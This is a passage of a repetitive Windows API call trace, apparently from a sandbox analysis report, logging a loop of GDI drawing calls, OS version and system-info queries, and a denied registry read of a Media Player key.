(hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.177] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.177] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.177] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.177] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.177] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.177] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.177] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x220401d3 [0088.177] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x200401d6 [0088.177] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fc0 [0088.177] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fc1 [0088.177] CombineRgn (hrgnDst=0x1040fc0, hrgnSrc1=0x220401d3, hrgnSrc2=0x200401d6, iMode=1) returned 1 [0088.177] CombineRgn (hrgnDst=0x1040fc1, hrgnSrc1=0x220401d3, hrgnSrc2=0x200401d6, iMode=4) returned 2 [0088.177] CreateSolidBrush (color=0xff) returned 0x2100fbf [0088.177] CreateSolidBrush (color=0xff0000) returned 0x1100fc2 [0088.177] DeleteObject (ho=0x1100fc2) returned 1 [0088.177] DeleteObject (ho=0x200401d6) returned 1 [0088.177] DeleteObject (ho=0x220401d3) returned 1 [0088.177] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.177] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.177] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.177] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.177] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.177] BeginPath (hdc=0x0) returned 0 [0088.177] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.177] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.177] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.177] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.177] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.177] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.178] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.178] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.178] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x210401d6 [0088.178] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x230401d3 [0088.178] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fc3 [0088.178] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fc4 [0088.178] CombineRgn (hrgnDst=0x1040fc3, hrgnSrc1=0x210401d6, hrgnSrc2=0x230401d3, iMode=1) returned 1 [0088.178] CombineRgn (hrgnDst=0x1040fc4, hrgnSrc1=0x210401d6, hrgnSrc2=0x230401d3, iMode=4) returned 2 [0088.178] CreateSolidBrush (color=0xff) returned 0x2100fc2 [0088.178] CreateSolidBrush (color=0xff0000) returned 0x1100fc5 [0088.178] DeleteObject (ho=0x1100fc5) returned 1 [0088.178] DeleteObject (ho=0x230401d3) returned 1 [0088.178] DeleteObject (ho=0x210401d6) returned 1 [0088.178] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.178] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.178] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.178] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.178] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.178] BeginPath (hdc=0x0) returned 0 [0088.178] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.178] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.178] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.178] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.178] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.178] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.178] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.178] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.178] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x240401d3 [0088.178] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x220401d6 [0088.178] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fc6 [0088.178] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fc7 [0088.178] CombineRgn (hrgnDst=0x1040fc6, hrgnSrc1=0x240401d3, hrgnSrc2=0x220401d6, iMode=1) returned 1 [0088.178] CombineRgn (hrgnDst=0x1040fc7, hrgnSrc1=0x240401d3, hrgnSrc2=0x220401d6, iMode=4) returned 2 [0088.178] CreateSolidBrush (color=0xff) returned 0x2100fc5 [0088.178] CreateSolidBrush (color=0xff0000) returned 0x1100fc8 [0088.179] DeleteObject (ho=0x1100fc8) returned 1 [0088.179] DeleteObject (ho=0x220401d6) returned 1 [0088.179] DeleteObject (ho=0x240401d3) returned 1 [0088.179] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.179] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.179] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.179] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.179] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.179] BeginPath (hdc=0x0) returned 0 [0088.179] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.179] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.179] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.179] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.179] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.179] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.179] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.179] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.179] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x230401d6 [0088.179] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x250401d3 [0088.179] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fc9 [0088.179] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fca [0088.179] CombineRgn (hrgnDst=0x1040fc9, hrgnSrc1=0x230401d6, hrgnSrc2=0x250401d3, iMode=1) returned 1 [0088.179] CombineRgn (hrgnDst=0x1040fca, hrgnSrc1=0x230401d6, hrgnSrc2=0x250401d3, iMode=4) returned 2 [0088.179] CreateSolidBrush (color=0xff) returned 0x2100fc8 [0088.179] CreateSolidBrush (color=0xff0000) returned 0x1100fcb [0088.179] DeleteObject (ho=0x1100fcb) returned 1 [0088.179] DeleteObject (ho=0x250401d3) returned 1 [0088.179] DeleteObject (ho=0x230401d6) returned 1 [0088.179] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.179] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.179] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.179] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.179] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.179] BeginPath (hdc=0x0) returned 0 [0088.179] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.179] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.179] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.179] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.179] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.179] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.180] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.180] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.180] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x260401d3 [0088.180] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x240401d6 [0088.180] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fcc [0088.180] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fcd [0088.180] CombineRgn (hrgnDst=0x1040fcc, hrgnSrc1=0x260401d3, hrgnSrc2=0x240401d6, iMode=1) returned 1 [0088.180] CombineRgn (hrgnDst=0x1040fcd, hrgnSrc1=0x260401d3, hrgnSrc2=0x240401d6, iMode=4) returned 2 [0088.180] CreateSolidBrush (color=0xff) returned 0x2100fcb [0088.180] CreateSolidBrush (color=0xff0000) returned 0x1100fce [0088.180] DeleteObject (ho=0x1100fce) returned 1 [0088.180] DeleteObject (ho=0x240401d6) returned 1 [0088.180] DeleteObject (ho=0x260401d3) returned 1 [0088.180] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.180] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.180] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.180] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.180] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.180] BeginPath (hdc=0x0) returned 0 [0088.180] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.180] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.180] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.180] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.180] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.180] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.180] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.180] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.180] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x250401d6 [0088.180] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x270401d3 [0088.180] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fcf [0088.180] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fd0 [0088.180] CombineRgn (hrgnDst=0x1040fcf, hrgnSrc1=0x250401d6, hrgnSrc2=0x270401d3, iMode=1) returned 1 [0088.180] CombineRgn (hrgnDst=0x1040fd0, hrgnSrc1=0x250401d6, hrgnSrc2=0x270401d3, iMode=4) returned 2 [0088.180] CreateSolidBrush (color=0xff) returned 0x2100fce [0088.180] CreateSolidBrush (color=0xff0000) returned 0x1100fd1 [0088.180] DeleteObject (ho=0x1100fd1) returned 1 [0088.180] DeleteObject (ho=0x270401d3) returned 1 [0088.180] DeleteObject (ho=0x250401d6) returned 1 [0088.181] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.181] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.181] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.181] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.181] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.181] BeginPath (hdc=0x0) returned 0 [0088.181] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.181] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.181] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.181] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.181] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.181] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.181] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.181] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.181] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x280401d3 [0088.181] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x260401d6 [0088.181] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fd2 [0088.181] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fd3 [0088.181] CombineRgn (hrgnDst=0x1040fd2, hrgnSrc1=0x280401d3, hrgnSrc2=0x260401d6, iMode=1) returned 1 [0088.181] CombineRgn (hrgnDst=0x1040fd3, hrgnSrc1=0x280401d3, hrgnSrc2=0x260401d6, iMode=4) returned 2 [0088.181] CreateSolidBrush (color=0xff) returned 0x2100fd1 [0088.181] CreateSolidBrush (color=0xff0000) returned 0x1100fd4 [0088.181] DeleteObject (ho=0x1100fd4) returned 1 [0088.181] DeleteObject (ho=0x260401d6) returned 1 [0088.181] DeleteObject (ho=0x280401d3) returned 1 [0088.181] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.181] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.181] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.181] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.181] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.181] BeginPath (hdc=0x0) returned 0 [0088.181] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.181] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.181] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.181] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.181] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.181] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.181] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.181] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.182] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x270401d6 [0088.182] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x290401d3 [0088.182] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fd5 [0088.182] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fd6 [0088.182] CombineRgn (hrgnDst=0x1040fd5, hrgnSrc1=0x270401d6, hrgnSrc2=0x290401d3, iMode=1) returned 1 [0088.182] CombineRgn (hrgnDst=0x1040fd6, hrgnSrc1=0x270401d6, hrgnSrc2=0x290401d3, iMode=4) returned 2 [0088.182] CreateSolidBrush (color=0xff) returned 0x2100fd4 [0088.182] CreateSolidBrush (color=0xff0000) returned 0x1100fd7 [0088.182] DeleteObject (ho=0x1100fd7) returned 1 [0088.182] DeleteObject (ho=0x290401d3) returned 1 [0088.182] DeleteObject (ho=0x270401d6) returned 1 [0088.182] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.182] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.182] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.182] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.182] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.182] BeginPath (hdc=0x0) returned 0 [0088.182] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.182] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.182] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.182] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.182] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.182] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.182] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.182] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.182] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2a0401d3 [0088.182] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x280401d6 [0088.182] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fd8 [0088.182] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fd9 [0088.182] CombineRgn (hrgnDst=0x1040fd8, hrgnSrc1=0x2a0401d3, hrgnSrc2=0x280401d6, iMode=1) returned 1 [0088.182] CombineRgn (hrgnDst=0x1040fd9, hrgnSrc1=0x2a0401d3, hrgnSrc2=0x280401d6, iMode=4) returned 2 [0088.182] CreateSolidBrush (color=0xff) returned 0x2100fd7 [0088.182] CreateSolidBrush (color=0xff0000) returned 0x1100fda [0088.182] DeleteObject (ho=0x1100fda) returned 1 [0088.182] DeleteObject (ho=0x280401d6) returned 1 [0088.182] DeleteObject (ho=0x2a0401d3) returned 1 [0088.182] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.182] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.183] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.183] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.183] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.183] BeginPath (hdc=0x0) returned 0 [0088.183] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.183] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.183] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.183] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.183] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.183] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.183] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.183] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.183] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x290401d6 [0088.183] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2b0401d3 [0088.183] CreateRectRgn (x1=0, 